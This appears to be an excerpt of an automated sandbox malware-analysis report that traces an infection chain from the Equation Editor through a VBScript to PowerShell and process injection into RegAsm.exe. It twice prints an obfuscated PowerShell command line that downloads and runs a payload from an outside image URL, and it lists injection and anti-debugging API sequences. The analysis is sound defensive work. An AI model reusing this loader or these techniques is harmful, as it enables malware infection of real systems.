                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,15_2_0040DD85
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,14_2_0041A748
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000Jump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 790Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2032Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1055Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5687Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)graph_14-53394
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 3992Thread sleep time: -300000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2832Thread sleep time: -60000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3120Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2756Thread sleep count: 1055 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2756Thread sleep count: 5687 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1908Thread sleep time: -60000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1888Thread sleep time: -2767011611056431s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1888Thread sleep time: -1800000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1888Thread sleep time: -600000s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2896Thread sleep time: -33000s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1960Thread sleep time: -120000s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1956Thread sleep time: -60000s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeLast function: Thread delayed
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_00409253 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,14_2_00409253
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0041C291 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,14_2_0041C291
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0040C34D FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,14_2_0040C34D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_00409665 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,14_2_00409665
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0044E879 FindFirstFileExA,14_2_0044E879
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0040880C __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,14_2_0040880C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0040783C FindFirstFileW,FindNextFileW,14_2_0040783C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_00419AF5 FindFirstFileW,FindNextFileW,FindNextFileW,14_2_00419AF5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0040BB30 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,14_2_0040BB30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0040BD37 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,14_2_0040BD37
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_100010F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,14_2_100010F1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_10006580 FindFirstFileExA,14_2_10006580
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_0040AE51 FindFirstFileW,FindNextFileW,15_2_0040AE51
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,17_2_00407EF8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 18_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,18_2_00407898
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_00407C97 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,14_2_00407C97
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_00418981 memset,GetSystemInfo,15_2_00418981
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Caches\Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Jump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEAPI call chain: ExitProcess graph end nodegraph_9-627
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeAPI call chain: ExitProcess graph end node
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_004349F9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,14_2_004349F9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,15_2_0040DD85
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0041CB50 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,14_2_0041CB50
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 9_2_003320C9 mov edx, dword ptr fs:[00000030h]9_2_003320C9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_004432B5 mov eax, dword ptr fs:[00000030h]14_2_004432B5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_10004AB4 mov eax, dword ptr fs:[00000030h]14_2_10004AB4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_00411CFE SetLastError,GetNativeSystemInfo,SetLastError,GetProcessHeap,HeapAlloc,SetLastError,14_2_00411CFE
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess token adjusted: Debug
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_00434B47 SetUnhandledExceptionFilter,14_2_00434B47
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_004349F9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,14_2_004349F9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0043BB22 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,14_2_0043BB22
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_00434FDC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,14_2_00434FDC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_100060E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,14_2_100060E2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_10002639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,14_2_10002639
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_10002B1C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,14_2_10002B1C

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Yara detected Powershell download and execute
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3084, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 2772, type: MEMORYSTR
                Bypasses PowerShell execution policy
                Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?Dg? ? ? ? ?M? ? ? ? ?? ? ? ? ?z? ? ? ? ?DE? ? ? ? ?M? ? ? ? ?? ? ? ? ?0? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?3? ? ? ? ?C8? ? ? ? ?aQB0? ? ? ? ?GU? ? ? ? ?bQBz? ? ? ? ?C8? ? ? ? ?dgBi? ? ? ? ?HM? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?LwB2? ? ? ? ?GI? ? ? ? ?cw? ? ? ? ?u? ? ? ? ?Go? ? ? ? ?c? ? ? ? ?Bn? ? ? ? ?Cc? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Hc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?E4? ? ? ? ?ZQB3? ? ? ? ?C0? ? ? ? ?TwBi? ? ? ? ?Go? ? ? ? ?ZQBj? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?BT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?E4? ? ? ? ?ZQB0? ? ? ? ?C4? ? ? ? ?VwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBC? ? ? ? ?Hk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?B3? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?EQ? ? ? ? ?bwB3? ? ? ? ?G4? ? ? ? ?b? ? ? ? ?Bv? ? ? ? ?GE? ? ? ? ?Z? ? ? ? ?BE? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?WwBT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?LgBF? ? ? ? ?G4? ? ? ? ?YwBv? ? ? ? ?GQ? ? ? ? ?aQBu? ? ? ? ?Gc? ? ? ? ?XQ? ? ? ? ?6? ? ? ? ?Do? ? ? ? ?VQBU? ? ? ? ?EY? ? ? ? ?O? ? ? ? ?? ? ? ? ?u? ? ? ? ?Ec? ? ? ? ?ZQB0? ? ? ? ?FM? ? ? ? ?d? ? ? ? ?By? ? ? ? ?Gk? ? ? ? ?bgBn? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?EI? ? ? ? ?QQBT? ? ? ? ?EU? ? ? ? ?Ng? ? ? ? ?0? ? ? ? ?F8? ? ? ? ?UwBU? ? ? ? ?EE? ? ? ? ?UgBU? ? ? ? ?D4? ? ? ? ?Pg? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bl? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?E
                Contains functionality to inject code into remote processes
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_004180EF GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,CreateProcessW,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtCreateSection,NtUnmapViewOfSection,NtMapViewOfSection,VirtualFree,NtClose,TerminateProcess,GetModuleHandleA,GetProcAddress,GetCurrentProcess,NtMapViewOfSection,WriteProcessMemory,SetThreadContext,ResumeThread,VirtualFree,GetCurrentProcess,NtUnmapViewOfSection,NtClose,TerminateProcess,GetLastError,14_2_004180EF
                Injects a PE file into a foreign processes
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5AJump to behavior
                Maps a DLL or memory area into another process
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe protection: execute and read and writeJump to behavior
                Writes to foreign memory regions
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 459000Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 471000Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 477000Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 478000Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 479000Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 47E000Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 7EFDE008Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe14_2_004120F7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_00419627 mouse_event,14_2_00419627
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\sweetbuttersmoothbananaherefor.vBs" Jump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?Dg? ? ? ? ?M? ? ? ? ?? ? ? ? ?z? ? ? ? ?DE? ? ? ? ?M? ? ? ? ?? ? ? ? ?0? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?3? ? ? ? ?C8? ? ? ? ?aQB0? ? ? ? ?GU? ? ? ? ?bQBz? ? ? ? ?C8? ? ? ? ?dgBi? ? ? ? ?HM? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?LwB2? ? ? ? ?GI? ? ? ? ?cw? ? ? ? ?u? ? ? ? ?Go? ? ? ? ?c? ? ? ? ?Bn? ? ? ? ?Cc? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Hc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?E4? ? ? ? ?ZQB3? ? ? ? ?C0? ? ? ? ?TwBi? ? ? ? ?Go? ? ? ? ?ZQBj? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?BT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?E4? ? ? ? ?ZQB0? ? ? ? ?C4? ? ? ? ?VwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBC? ? ? ? ?Hk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?B3? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?EQ? ? ? ? ?bwB3? ? ? ? ?G4? ? ? ? ?b? ? ? ? ?Bv? ? ? ? ?GE? ? ? ? ?Z? ? ? ? ?BE? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?WwBT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?LgBF? ? ? ? ?G4? ? ? ? ?YwBv? ? ? ? ?GQ? ? ? ? ?aQBu? ? ? ? ?Gc? ? ? ? ?XQ? ? ? ? ?6? ? ? ? ?Do? ? ? ? ?VQBU? ? ? ? ?EY? ? ? ? ?O? ? ? ? ?? ? ? ? ?u? ? ? ? ?Ec? ? ? ? ?ZQB0? ? ? ? ?FM? ? ? ? ?d? ? ? ? ?By? ? ? ? ?Gk? ? ? ? ?bgBn? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?EI? ? ? ? ?QQBT? ? ? ? ?EU? ? ? ? ?Ng? ? ? ? ?0? ? ? ? ?F8? ? ? ? ?UwBU? ? ? ? ?EE? ? ? ? ?UgBU? ? ? ? ?D4? ? ? ? ?Pg? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bl? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?EJump to behavior
